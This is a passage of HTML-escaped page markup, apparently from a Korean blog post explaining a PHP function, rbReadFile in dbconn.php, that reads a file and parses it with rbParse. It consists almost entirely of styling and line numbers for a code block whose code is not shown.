!important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$content&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1aa1026752802-6&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;/div&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&lt;strong style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;rbReadFile function in dbconn.php&lt;/strong&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;먼저 파일 경로에 있는 파일을 읽어온 후 rbParse 함수를 통해 데이터를 파싱합니다.&lt;/p&gt;&lt;div id=&quot;crayon-5c677473e1aa4811772815&quot; class=&quot;crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate&quot; data-settings=&quot; minimize scroll-mouseover&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; text-size-adjust: none; width: 750px; padding: 0px; margin: 12px 0px; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace; color: rgb(60, 72, 88); height: auto; overflow: hidden !important; position: relative !important; direction: ltr !important; border: 1px solid rgb(222, 222, 222) !important; background-color: rgb(248, 248, 255) !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-plain-wrap form-group&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; position: relative; background: 0px center; border: 0px; margin: 0px !important; padding: 0px !important; height: auto !important;&quot;&gt;&lt;textarea wrap=&quot;soft&quot; class=&quot;crayon-plain print-no form-control&quot; data-settings=&quot;dblclick&quot; readonly=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; color: rgb(0, 0, 0); font-style: inherit; font-variant: inherit; font-stretch: inherit; margin: 0px 0px 7px; overflow: hidden; max-width: 100%; padding-top: 0px; padding-right: 5px; padding-left: 5px; display: block; width: 748px; height: 0px; background: linear-gradient(rgb(156, 39, 176), rgb(156, 39, 176)) center bottom / 0px 2px no-repeat, linear-gradient(rgb(210, 210, 210), rgb(210, 210, 210)) center calc(100% - 1px) / 100% 1px transparent; border-width: 0px; border-style: initial; border-color: initial; border-radius: 0px; box-shadow: none; transition: background 0s ease-out 0s; float: none; vertical-align: middle; resize: none; position: absolute; opacity: 0; white-space: pre; overflow-wrap: normal; tab-size: 4; z-index: 0; font-size: 12px !important; line-height: 15px !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important;&quot;&gt;&lt;/textarea&gt;&lt;/div&gt;&lt;div class=&quot;crayon-main&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: 0px; padding: 0px; margin: 0px; width: 748px; overflow: hidden; position: relative; z-index: 1;&quot;&gt;&lt;table class=&quot;crayon-table&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-size: 18px; margin-left: 0px; border-collapse: collapse !important; border-spacing: 0px !important; background: none !important; width: auto !important; border: none !important; padding: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-top: 0px !important; table-layout: auto !important;&quot;&gt;&lt;tbody style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;&lt;tr class=&quot;crayon-row&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: none !important; padding: 0px !important; vertical-align: top !important; margin: 0px !important;&quot;&gt;&lt;td class=&quot;crayon-nums &quot; data-settings=&quot;show&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding: 0px !important; vertical-align: top !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important; border: 0px; margin: 0px !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important;&quot;&gt;&lt;div class=&quot;crayon-nums-content&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: 0px; padding-right: 0px; padding-left: 0px; margin: 0px; white-space: nowrap; padding-top: 5px !important; padding-bottom: 3px !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-1&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;1&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-2&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;2&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-3&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;3&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-4&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;4&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-5&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;5&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-6&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;6&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-7&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;7&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-8&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;8&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-9&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;9&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-10&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;10&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-11&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;11&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-12&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;12&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-13&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;13&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-14&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;14&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-15&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;15&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-16&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;16&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-17&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;17&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-18&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;18&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-19&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;19&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-20&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;20&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-21&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;21&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-22&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;22&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-23&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;23&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-24&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;24&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-25&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;25&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-26&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;26&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-27&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;27&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-28&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;28&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-29&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;29&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-30&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;30&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-31&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;31&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-32&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;32&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-33&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;33&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-34&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;34&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-35&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;35&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-36&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;36&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-37&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;37&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-38&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;38&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-39&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;39&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-40&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;40&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-41&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;41&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-42&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;42&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-43&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;43&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1aa4811772815-44&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;44&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;crayon-code&quot; style=&quot;box-sizing: border-box; 